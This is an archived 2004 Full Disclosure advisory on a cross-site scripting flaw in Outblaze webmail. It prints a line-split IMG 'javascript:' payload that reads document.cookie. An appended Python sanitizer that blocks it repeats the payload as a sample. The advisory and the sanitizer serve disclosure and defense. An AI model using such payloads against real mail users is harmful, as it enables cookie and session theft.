Full Disclosure mailing list archives
Cross-Site Scripting email Outblaze
From: "DarkBicho" <darkbicho () fastmail fm>
Date: Sun, 18 Jul 2004 03:05:40 -0700
Original Advisory: http://www.swp-zone.org/archivos/advisory-09.txt

-------------------------------------------------------------------------------------------------
                    :.: Cross-Site Scripting email Outblaze :.:

PROGRAM: Outblaze Email
HOMEPAGE: http://www.outblaze.com/
BUG: Cross-Site Scripting
DATE: 23/05/2004
AUTHOR: DarkBicho
        Web: http://www.darkbicho.tk
        team: Security Wari Proyects <www.swp-zone.org>
              PerUnderforce <www.perunderforce.tk>
        Email: darkbicho () peru com
-------------------------------------------------------------------------------------------------

1.- Intro:
    ~~~~~~

Outblaze Web based e-mail supports SMTP and POP3 Internet protocols, which allows it to be used as a front-end to multiple e-mail accounts.

Some websites that use Outblaze Email: linumail.org, Peru.com, bolivia.com and colombia.com, etc.

2.- Exploit:
    ~~~~~~~

To exploit this simple flaw, it is enough to send the following HTML code:

<IMG SRC="javasc
ript:alert (document.cookie)";" border="0" height="1" width="1">

Example: http://www.swp-zone.org/archivos//linuxmail.gif

3.- Test:
    ~~~~

http://darkbicho.iberhosting.net/email/

4.- Greetings:
    ~~~~~~~~~

Greetings to my Peruvian group swp, perunderforce.

"PISCO IS AND WILL BE PERUVIAN"

5.- Contact
    -------

WEB: http://www.darkbicho.tk
EMAIL: darkbicho () peru com

-------------------------------------------------------------------------------------------------
Security Wari Projects (c) 2002 - 2004 Made in Peru
----------------------------------------[ EOF ]----------------------------------------------

DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"

---------------------- The End ----------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
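The following is an added example, not part of the original advisory and not Outblaze's code: a minimal server-side sanitizer for HTML mail bodies that rejects the advisory's `IMG SRC` payload by normalizing whitespace inside the URL scheme before checking it against an allowlist. The tag, attribute and scheme allowlists and all function names are assumptions made for this sketch.

```python
import html
import re
from html.parser import HTMLParser

# Assumed allowlist policy for this sketch; anything not listed is dropped.
ALLOWED_TAGS = {"b", "i", "p", "br", "img", "a"}
ALLOWED_ATTRS = {"src", "href", "alt", "border", "height", "width"}
URL_ATTRS = {"src", "href"}
ALLOWED_SCHEMES = {"http", "https", "cid"}
VOID_TAGS = {"br", "img"}
# Constructed sample: a benign paragraph followed by the advisory's payload.
SAMPLE = ('<p>hi</p><IMG SRC="javasc\nript:alert (document.cookie)";" '
          'border="0" height="1" width="1">')

def url_scheme(value):
    """Return the lowercased scheme as a browser would read it, or None."""
    # Browsers drop tab/LF/CR anywhere in a URL and ignore leading control
    # characters and spaces, so the check must do the same first.
    cleaned = re.sub(r"[\t\n\r]", "", value)
    cleaned = cleaned.lstrip("".join(map(chr, range(0x21))))
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", cleaned)
    return m.group(1).lower() if m else None

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:  # values arrive entity-decoded
            if name not in ALLOWED_ATTRS or value is None:
                continue
            if name in URL_ATTRS and url_scheme(value) not in ALLOWED_SCHEMES:
                continue  # javascript:, data:, relative URLs, ...
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def sanitize(body):
    parser = MailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)
```

A check that compares the raw attribute value against the string `javascript:` misses this payload because of the line break inside the scheme name; the allowlist applied after normalization does not depend on enumerating such variants.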